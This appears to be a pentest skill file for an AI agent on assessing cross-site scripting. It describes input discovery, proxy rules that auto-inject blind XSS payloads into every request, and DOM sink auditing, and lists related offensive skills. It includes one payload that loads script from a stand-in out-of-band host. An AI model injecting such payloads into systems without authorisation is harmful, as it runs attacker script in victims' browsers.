pentest-xss
Cross-Site Scripting (XSS) Assessment
XSS stands for Cross-Site Scripting. ‘Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end-user.’ -OWASP
Activation Triggers (Positive)
xsscross-site scriptingblind xssreflected xssstored xssdom xsspolyglot payloadcsp bypasswaf bypass
Exclusion Triggers (Negative)
sql injectionrcenetwork scanreport writing only
Instructions
- Discover Attack Surface: Identify all user-controllable input vectors, including URL parameters, headers (User-Agent, Referer, X-Forwarded-For), cookies, and request bodies (JSON, XML).
- Contextual Analysis: Determine where the input is reflected (HTML tag, attribute, JavaScript block, etc.) and what encoding/filtering is applied.
- Automated Hunting: Use "Match and Replace" rules in proxy tools to inject payloads into every request header and parameter to catch edge-case reflections and blind XSS.
- Blind XSS Delivery: Deploy OOB (Out-of-Band) interactions using a dedicated listener (e.g., Interact.sh) to detect delayed executions in internal or administrative panels.
- DOM Source-to-Sink Mapping: Audit client-side scripts for hazardous sinks (e.g.,
innerHTML,document.write) coupled with controllable sources (e.g.,location.hash).
Tip 1: Hunting for Blind XSS with Match and Replace Rules
Automatically inject blind XSS payloads while browsing your targets, helping you discover vulnerabilities more efficiently. To find blind XSS vulnerabilities while browsing, set up this match and replace rule in your proxy interceptor (like Burp Suite) to auto-send your blind XSS payload in each request.
The delayed execution, invisible injection point, and the requirement of a dedicated server that handles incoming invocations make it difficult to find and exploit blind XSS vulnerabilities. However, these XSS types are more critical by nature, which makes them worth testing for.
Link to social post here (Placeholder)
Should Do
- Use unique, traceable identifiers in payloads (e.g.,
<script src="//[unique_id].oob.server"></script>). - Prioritize testing headers that are likely to be stored and viewed by administrators (e.g.,
User-Agent). - Document the exact context of the vulnerability (e.g., "Reflected in attribute
valuewithin aformtag").
Should Not Do
- Do not assume that WAF presence means XSS is impossible; test for bypasses and encoding variations.
- Do not use disruptive payloads in production environments (e.g., those that redirect users or steal real session tokens).
- Do not stop testing after finding one XSS; check for multiple instances and types across the application.
More from crtvrffnrt/skills
pentest-exploit-execution-payload-control
Security assessment skill for deterministic exploit execution from validated primitives. Use when prompts include exploit implementation, payload hardening, chaining confirmed weaknesses, post-exploitation proof, or controlled impact demonstration. Do not use for early-stage reconnaissance, speculative hypothesis generation, or report-only requests.
30pentest-outbound-interaction-oob-detection
Security assessment skill for outbound interaction and out-of-band (OOB) validation. Use when prompts include SSRF callback confirmation, blind XSS beacons, webhook abuse, XXE/OOB behavior, DNS/HTTP callback correlation, or asynchronous server-side interaction proof. Do not use when vulnerabilities are fully in-band and require no external callback correlation.
25pentest-evidence-structuring-report-synthesis
Security assessment skill for structuring evidence, deduplicating findings, and producing decision-ready security reports. Use when prompts include write report, consolidate findings, severity ranking, remediation guidance, executive summary, or technical appendix generation. Do not use for live exploit execution, reconnaissance, or payload experimentation tasks.
25pentest-input-protocol-manipulation
Security assessment skill for input validation abuse and protocol-level manipulation. Use when prompts include injection, parser differential testing, request smuggling, method tampering, header confusion, serialization abuse, or payload mutation for exploitability testing. Do not use when the task is mainly authz boundary review, business workflow abuse, or report synthesis.
24pentest-authentication-authorization-review
Security assessment skill for authentication and authorization controls. Use when prompts include session handling, token abuse, MFA weaknesses, account takeover, IDOR/BOLA/BFLA, privilege escalation, tenant isolation, or identity boundary validation. Do not use when the task is generic recon, pure parser fuzzing, or final report composition only.
24pentest-gemini-sub-htb
Use when users ask for Hack The Box machine compromise workflows from recon to foothold and privilege escalation.
22